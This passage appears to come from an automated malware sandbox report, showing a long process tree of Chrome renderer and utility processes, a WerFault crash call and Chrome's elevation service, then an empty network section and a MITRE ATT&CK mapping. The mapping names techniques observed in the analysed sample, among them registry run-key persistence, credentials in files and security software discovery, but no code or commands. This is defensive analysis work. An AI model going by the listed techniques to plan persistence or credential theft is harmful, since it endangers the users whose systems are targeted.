  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6496 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6652 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6684 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:2580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6784 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:3644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6388 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:3184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=7020 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:3840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6532 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:4516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6908 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6380 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:1892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6564 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6392 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=7376 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:3576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4492 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:5148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7312 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:5868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7132 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:2400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=4452 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:1908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7108 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6692 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:1388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6568 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:8
  2⤵
  PID:2508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5312 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:2
  2⤵
  PID:5304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=4732 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:4664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7132 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:4488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=5500 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:5640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7780 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=6720 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=4884 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=7056 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=6820 --field-trial-handle=1836,i,11914545688233706265,5526100508699956683,131072 /prefetch:1
  2⤵
  PID:2220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3160 -ip 3160
1⤵
PID:5936

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5700

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Security Software Discovery

T1063

System Information Discovery